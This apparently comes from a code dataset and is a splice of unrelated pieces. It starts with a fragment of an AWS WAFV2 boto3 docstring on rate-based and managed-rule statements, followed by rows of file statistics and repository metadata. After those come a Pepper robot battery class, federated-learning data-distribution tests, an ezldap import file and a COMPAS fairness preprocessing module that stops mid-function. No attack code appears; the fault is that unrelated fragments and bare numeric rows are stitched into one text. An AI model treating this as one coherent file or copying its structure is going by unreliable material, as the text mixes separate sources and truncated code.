IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
| 69.15393
| 41,777
| 0.679977
| 85,502
| 631,652
| 5.011134
| 0.016222
| 0.015572
| 0.002661
| 0.007478
| 0.976103
| 0.973384
| 0.97179
| 0.969435
| 0.967689
| 0.964681
| 0
| 0.008494
| 0.244755
| 631,652
| 9,133
| 41,778
| 69.161502
| 0.889651
| 0.986491
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
5a28343ec98f2153ec88919700447a453163efef
| 184
|
py
|
Python
|
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/pepper_interface/body/battery.py
|
MPI-IS/reactive_pepper
|
079f9b0627bfd6c9e3f2a4466c95ad662002a600
|
[
"BSD-3-Clause"
] | null | null | null |
class Battery:
def __init__(self,battery_proxy):
self._battery_proxy = battery_proxy
def get(self):
return self._battery_proxy.getBatteryCharge()
| 23
| 53
| 0.657609
| 20
| 184
| 5.55
| 0.45
| 0.432432
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266304
| 184
| 7
| 54
| 26.285714
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5a34aaae151398e1cdfdfa2eeb4a19eee3e90013
| 4,797
|
py
|
Python
|
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | 2
|
2021-11-14T12:04:39.000Z
|
2022-01-03T16:03:36.000Z
|
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | null | null | null |
test/data_distribution/test_data_distribution_iid.py
|
joarreg/Sherpa.ai-Federated-Learning-Framework
|
9da392bf71c9acf13761dde0f119622c62780c87
|
[
"Apache-2.0"
] | 1
|
2022-01-19T16:29:46.000Z
|
2022-01-19T16:29:46.000Z
|
import numpy as np
import tensorflow as tf
from shfl.data_base.data_base import DataBase
from shfl.data_distribution.data_distribution_iid import IidDataDistribution
class TestDataBase(DataBase):
def __init__(self):
super(TestDataBase, self).__init__()
def load_data(self):
self._train_data = np.random.rand(200).reshape([40, 5])
self._test_data = np.random.rand(200).reshape([40, 5])
self._train_labels = tf.keras.utils.to_categorical(np.random.randint(0, 10, 40))
self._test_labels = tf.keras.utils.to_categorical(np.random.randint(0, 10, 40))
def test_make_data_federated():
data = TestDataBase()
data.load_data()
data_distribution = IidDataDistribution(data)
train_data, train_label = data_distribution._database.train
num_nodes = 3
percent = 60
# weights = np.full(num_nodes, 1/num_nodes)
weights = [0.5, 0.25, 0.25]
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights)
data_distribution.get_federated_data(3)
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
#test make federated data with replacement
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights,
sampling="with_replacement")
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
def test_make_data_federated_wrong_weights():
data = TestDataBase()
data.load_data()
data_distribution = IidDataDistribution(data)
train_data, train_label = data_distribution._database.train
num_nodes = 3
percent = 60
# weights = np.full(num_nodes, 1/num_nodes)
weights = [0.5, 0.5, 0.5]
federated_data, federated_label = data_distribution.make_data_federated(train_data,
train_label,
num_nodes,
percent,
weights)
weights = np.array([float(i) / sum(weights) for i in weights])
data_distribution.get_federated_data(3)
all_data = np.concatenate(federated_data)
all_label = np.concatenate(federated_label)
idx = []
for data in all_data:
idx.append(np.where((data == train_data).all(axis=1))[0][0])
for i, weight in enumerate(weights):
assert federated_data[i].shape[0] == int(weight * int(percent * train_data.shape[0] / 100))
assert all_data.shape[0] == int(percent * train_data.shape[0] / 100)
assert num_nodes == federated_data.shape[0] == federated_label.shape[0]
assert (np.sort(all_data.ravel()) == np.sort(train_data[idx,].ravel())).all()
assert (np.sort(all_label, 0) == np.sort(train_label[idx], 0)).all()
| 44.009174
| 104
| 0.554722
| 556
| 4,797
| 4.548561
| 0.133094
| 0.064057
| 0.04745
| 0.045077
| 0.858442
| 0.839462
| 0.839462
| 0.839462
| 0.839462
| 0.813365
| 0
| 0.030494
| 0.336877
| 4,797
| 108
| 105
| 44.416667
| 0.764539
| 0.025849
| 0
| 0.7625
| 0
| 0
| 0.003427
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a814e6e3a3903a3c1eaaf3086331127293a606f
| 118
|
py
|
Python
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 7
|
2018-05-10T01:31:46.000Z
|
2021-03-30T10:13:41.000Z
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 1
|
2019-04-24T15:59:18.000Z
|
2019-04-24T15:59:18.000Z
|
ezldap/__init__.py
|
mschaffenroth/ezldap
|
c2b3fe453d7ad60e4ff3e2245a8f4914a91542c4
|
[
"BSD-3-Clause"
] | 2
|
2020-11-15T12:18:08.000Z
|
2021-03-30T10:13:44.000Z
|
from .api import *
from .password import *
from .config import *
from .ldif import *
from .version import __version__
| 19.666667
| 32
| 0.754237
| 16
| 118
| 5.3125
| 0.4375
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169492
| 118
| 5
| 33
| 23.6
| 0.867347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ce681fca8c026eb969132e02436b63d973b5bce1
| 28,158
|
py
|
Python
|
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
models/compas_model.py
|
GU-DataLab/fairness-and-missing-values
|
36a900aa235d1d53bd57e11c89e3f73f9a585aca
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("../AIF360/")
import numpy as np
from tot_metrics import TPR, TNR
from aif360.metrics import BinaryLabelDatasetMetric
from aif360.algorithms.preprocessing.optim_preproc import OptimPreproc
from aif360.algorithms.preprocessing.optim_preproc_helpers.opt_tools\
import OptTools
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from aif360.datasets import StandardDataset
import warnings
import pandas as pd
warnings.simplefilter("ignore")
from sklearn.utils import resample
from sklearn.model_selection import train_test_split
def get_distortion_compas(vold, vnew):
"""Distortion function for the compas dataset. We set the distortion
metric here. See section 4.3 in supplementary material of
http://papers.nips.cc/paper/6988-optimized-pre-processing-for-discrimination-prevention
for an example
Note:
Users can use this as templates to create other distortion functions.
Args:
vold (dict) : {attr:value} with old values
vnew (dict) : dictionary of the form {attr:value} with new values
Returns:
d (value) : distortion value
"""
# Distortion cost
distort = {}
distort['two_year_recid'] = pd.DataFrame(
{'No recid.': [0., 2.],
'Did recid.': [2., 0.]},
index=['No recid.', 'Did recid.'])
distort['age_cat'] = pd.DataFrame(
{'Less than 25': [0., 1., 2.],
'25 to 45': [1., 0., 1.],
'Greater than 45': [2., 1., 0.]},
index=['Less than 25', '25 to 45', 'Greater than 45'])
distort['c_charge_degree'] = pd.DataFrame(
{'M': [0., 2.],
'F': [1., 0.]},
index=['M', 'F'])
distort['priors_count'] = pd.DataFrame(
{'0': [0., 1., 2., 100.],
'1 to 3': [1., 0., 1., 100.],
'More than 3': [2., 1., 0., 100.],
'missing': [0., 0., 0., 1.]},
index=['0', '1 to 3', 'More than 3', 'missing'])
distort['score_text'] = pd.DataFrame(
{'Low': [0., 2.],
'MediumHigh': [2., 0.]},
index=['Low', 'MediumHigh'])
distort['sex'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
distort['race'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
total_cost = 0.0
for k in vold:
if k in vnew:
total_cost += distort[k].loc[vnew[k], vold[k]]
return total_cost
default_mappings = {
'label_maps': [{1.0: 'Did recid.', 0.0: 'No recid.'}],
'protected_attribute_maps': [{0.0: 'Male', 1.0: 'Female'},
{1.0: 'Caucasian', 0.0: 'Not Caucasian'}]
}
def default_preprocessing(df):
"""Perform the same preprocessing as the original analysis:
https://github.com/propublica/compas-analysis/blob/master/Compas%20Analysis.ipynb
"""
return df[(df.days_b_screening_arrest <= 30)
& (df.days_b_screening_arrest >= -30)
& (df.is_recid != -1)
& (df.c_charge_degree != 'O')
& (df.score_text != 'N/A')]
class CompasDataset(StandardDataset):
"""ProPublica COMPAS Dataset.
See :file:`aif360/data/raw/compas/README.md`.
"""
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
def quantizeLOS(x):
if x <= 7:
return 0
if 8 < x <= 93:
return 1
else:
return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-scores-two-years.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
super(
CompasDataset,
self).__init__(
df=df,
label_name=label_name,
favorable_classes=favorable_classes,
protected_attribute_names=protected_attribute_names,
privileged_classes=privileged_classes,
instance_weights_name=instance_weights_name,
categorical_features=categorical_features,
features_to_keep=features_to_keep,
features_to_drop=features_to_drop,
na_values=na_values,
custom_preprocessing=custom_preprocessing,
metadata=metadata)
def reweight_df(dataset_orig_train):
df_weight = dataset_orig_train.convert_to_dataframe()[0]
df_weight['weight'] = 1
df_weight['is_missing'] = 0
df_weight['tmp'] = ''
tmp_result = []
for i, j in zip(df_weight['race'], df_weight['two_year_recid']):
tmp_result.append(str(i) + str(j))
df_weight['tmp'] = tmp_result
df_weight.loc[df_weight['priors_count=missing'] == 1, 'is_missing'] = 1
for i in df_weight['tmp'].unique():
df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
'weight'] = len(df_weight.loc[(df_weight['tmp'] == i),
:].index) / len(df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
:].index)
df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 1),
'weight'] = len(df_weight.loc[(df_weight['tmp'] == i) & (df_weight['is_missing'] == 0),
:].index) / len(df_weight.loc[(df_weight['tmp'] == i),
:].index)
return np.array(df_weight['weight'])
def get_evaluation(dataset_orig_vt,y_pred,privileged_groups,unprivileged_groups,unpriv_val,priv_val,pos_label):
print('Accuracy')
print(accuracy_score(dataset_orig_vt.labels, y_pred))
dataset_orig_vt_copy1 = dataset_orig_vt.copy()
dataset_orig_vt_copy1.labels = y_pred
metric_transf_train1 = BinaryLabelDatasetMetric(
dataset_orig_vt_copy1,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print('p-rule')
print(min(metric_transf_train1.disparate_impact(),
1 / metric_transf_train1.disparate_impact()))
print('FPR for unpriv group')
orig_sens_att = dataset_orig_vt.protected_attributes.ravel()
print(1 - TNR(dataset_orig_vt.labels.ravel()
[orig_sens_att == unpriv_val], y_pred[orig_sens_att == unpriv_val], pos_label))
print("FNR for unpriv group")
print(1 - TPR(dataset_orig_vt.labels.ravel()
[orig_sens_att == unpriv_val], y_pred[orig_sens_att == unpriv_val], pos_label))
print('FPR for priv group')
orig_sens_att = dataset_orig_vt.protected_attributes.ravel()
print(1 - TNR(dataset_orig_vt.labels.ravel()
[orig_sens_att == priv_val], y_pred[orig_sens_att == priv_val], pos_label))
print("FNR for priv group")
print(1 - TPR(dataset_orig_vt.labels.ravel()
[orig_sens_att == priv_val], y_pred[orig_sens_att == priv_val], pos_label))
def get_distortion_compas_sel(vold, vnew):
"""Distortion function for the compas dataset. We set the distortion
metric here. See section 4.3 in supplementary material of
http://papers.nips.cc/paper/6988-optimized-pre-processing-for-discrimination-prevention
for an example
Note:
Users can use this as templates to create other distortion functions.
Args:
vold (dict) : {attr:value} with old values
vnew (dict) : dictionary of the form {attr:value} with new values
Returns:
d (value) : distortion value
"""
# Distortion cost
distort = {}
distort['two_year_recid'] = pd.DataFrame(
{'No recid.': [0., 2.],
'Did recid.': [2., 0.]},
index=['No recid.', 'Did recid.'])
distort['age_cat'] = pd.DataFrame(
{'Less than 25': [0., 1., 2.],
'25 to 45': [1., 0., 1.],
'Greater than 45': [2., 1., 0.]},
index=['Less than 25', '25 to 45', 'Greater than 45'])
distort['c_charge_degree'] = pd.DataFrame(
{'M': [0., 2.],
'F': [1., 0.]},
index=['M', 'F'])
distort['priors_count'] = pd.DataFrame(
{'0': [0., 1., 2.],
'1 to 3': [1., 0., 1.],
'More than 3': [2., 1., 0.]},
index=['0', '1 to 3', 'More than 3'])
distort['score_text'] = pd.DataFrame(
{'Low': [0., 2.],
'MediumHigh': [2., 0.]},
index=['Low', 'MediumHigh'])
distort['sex'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
distort['race'] = pd.DataFrame(
{0.0: [0., 2.],
1.0: [2., 0.]},
index=[0.0, 1.0])
total_cost = 0.0
for k in vold:
if k in vnew:
total_cost += distort[k].loc[vnew[k], vold[k]]
return total_cost
class CompasDataset_test(StandardDataset):
def __init__(
self,
label_name='two_year_recid',
favorable_classes=[0],
protected_attribute_names=[
'sex',
'race'],
privileged_classes=[
['Female'],
['Caucasian']],
instance_weights_name=None,
categorical_features=[
'age_cat',
'c_charge_degree',
'c_charge_desc'],
features_to_keep=[
'sex',
'age',
'age_cat',
'race',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'c_charge_degree',
'c_charge_desc',
'two_year_recid',
'length_of_stay'],
features_to_drop=[],
na_values=[],
custom_preprocessing=default_preprocessing,
metadata=default_mappings):
np.random.seed(1)
def quantizePrior1(x):
if x <= 0:
return 0
elif 1 <= x <= 3:
return 1
else:
return 2
def quantizeLOS(x):
if x <= 7:
return 0
if 8 < x <= 93:
return 1
else:
return 2
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
filepath = 'data/compas/compas-test.csv'
df = pd.read_csv(filepath, index_col='id', na_values=[])
df['age_cat'] = df['age_cat'].replace('Greater than 45', 2)
df['age_cat'] = df['age_cat'].replace('25 - 45', 1)
df['age_cat'] = df['age_cat'].replace('Less than 25', 0)
df['score_text'] = df['score_text'].replace('High', 1)
df['score_text'] = df['score_text'].replace('Medium', 1)
df['score_text'] = df['score_text'].replace('Low', 0)
df['priors_count'] = df['priors_count'].apply(
lambda x: quantizePrior1(x))
df['length_of_stay'] = (pd.to_datetime(df['c_jail_out']) -
pd.to_datetime(df['c_jail_in'])).apply(
lambda x: x.days)
df['length_of_stay'] = df['length_of_stay'].apply(
lambda x: quantizeLOS(x))
df = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
df['c_charge_degree'] = df['c_charge_degree'].replace({'F': 0, 'M': 1})
# _,df = train_test_split(df,test_size = 4000,random_state = 1)
df['c_charge_degree'] = df['c_charge_degree'].replace({0: 'F', 1: 'M'})
super(
CompasDataset_test,
self).__init__(
df=df,
label_name=label_name,
favorable_classes=favorable_classes,
protected_attribute_names=protected_attribute_names,
privileged_classes=privileged_classes,
instance_weights_name=instance_weights_name,
categorical_features=categorical_features,
features_to_keep=features_to_keep,
features_to_drop=features_to_drop,
na_values=na_values,
custom_preprocessing=custom_preprocessing,
metadata=metadata)
def load_preproc_data_compas_test(protected_attributes=None):
def custom_preprocessing(df):
df = df[['age',
'c_charge_degree',
'race',
'age_cat',
'score_text',
'sex',
'priors_count',
'days_b_screening_arrest',
'decile_score',
'is_recid',
'two_year_recid',
'length_of_stay']]
# Indices of data samples to keep
ix = df['days_b_screening_arrest'] <= 30
ix = (df['days_b_screening_arrest'] >= -30) & ix
ix = (df['is_recid'] != -1) & ix
ix = (df['c_charge_degree'] != "O") & ix
ix = (df['score_text'] != 'N/A') & ix
df = df.loc[ix, :]
# Restrict races to African-American and Caucasian
dfcut = df.loc[~df['race'].isin(
['Native American', 'Hispanic', 'Asian', 'Other']), :]
# Restrict the features to use
dfcutQ = dfcut[['sex',
'race',
'age_cat',
'c_charge_degree',
'score_text',
'priors_count',
'is_recid',
'two_year_recid',
'length_of_stay']].copy()
# Quantize priors count between 0, 1-3, and >3
def quantizePrior(x):
if x == 0:
return '0'
elif x == 1:
return '1 to 3'
elif x == 2:
return 'More than 3'
else:
return 'missing'
# Quantize length of stay
def quantizeLOS(x):
if x == 0:
return '<week'
if x == 1:
return '<3months'
else:
return '>3 months'
# Quantize length of stay
def adjustAge(x):
if x == 1:
return '25 to 45'
elif x == 2:
return 'Greater than 45'
elif x == 0:
return 'Less than 25'
# Quantize score_text to MediumHigh
def quantizeScore(x):
if x == 1:
return 'MediumHigh'
else:
return 'Low'
def group_race(x):
if x == "Caucasian":
return 1.0
else:
return 0.0
dfcutQ['priors_count'] = dfcutQ['priors_count'].apply(
lambda x: quantizePrior(x))
dfcutQ['length_of_stay'] = dfcutQ['length_of_stay'].apply(
lambda x: quantizeLOS(x))
dfcutQ['score_text'] = dfcutQ['score_text'].apply(
lambda x: quantizeScore(x))
dfcutQ['age_cat'] = dfcutQ['age_cat'].apply(lambda x: adjustAge(x))
# Recode sex and race
dfcutQ['sex'] = dfcutQ['sex'].replace({'Female': 1.0, 'Male': 0.0})
dfcutQ['race'] = dfcutQ['race'].apply(lambda x: group_race(x))
features = ['two_year_recid', 'race',
'age_cat', 'priors_count', 'c_charge_degree', 'score_text']
# Pass vallue to df
